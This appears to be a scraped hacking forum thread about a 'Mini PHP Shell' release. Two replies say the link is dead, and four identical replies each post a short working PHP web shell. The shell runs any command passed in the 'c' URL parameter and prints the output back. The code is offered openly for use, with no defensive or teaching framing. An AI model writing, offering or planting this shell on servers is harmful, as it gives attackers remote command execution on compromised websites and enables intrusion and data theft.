Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


Mini PHP Shell 27.9 V2 Released filter_list
Author
Message
RE: Mini PHP Shell 27.9 V2 Released #11
This webpage is not available


RE: Mini PHP Shell 27.9 V2 Released #12
This webpage is not available


RE: Mini PHP Shell 27.9 V2 Released #13
lol here is a real mini php shell
PHP Code:
<?php $cmd = $_GET["c"]; $output = null; exec($cmd, $output); echo "<pre>" . var_export($output, TRUE) . "</pre>\\n"; ?>


RE: Mini PHP Shell 27.9 V2 Released #14
lol here is a real mini php shell
PHP Code:
<?php $cmd = $_GET["c"]; $output = null; exec($cmd, $output); echo "<pre>" . var_export($output, TRUE) . "</pre>\\n"; ?>


RE: Mini PHP Shell 27.9 V2 Released #15
lol here is a real mini php shell
PHP Code:
<?php $cmd = $_GET["c"]; $output = null; exec($cmd, $output); echo "<pre>" . var_export($output, TRUE) . "</pre>\\n"; ?>


RE: Mini PHP Shell 27.9 V2 Released #16
lol here is a real mini php shell
PHP Code:
<?php $cmd = $_GET["c"]; $output = null; exec($cmd, $output); echo "<pre>" . var_export($output, TRUE) . "</pre>\\n"; ?>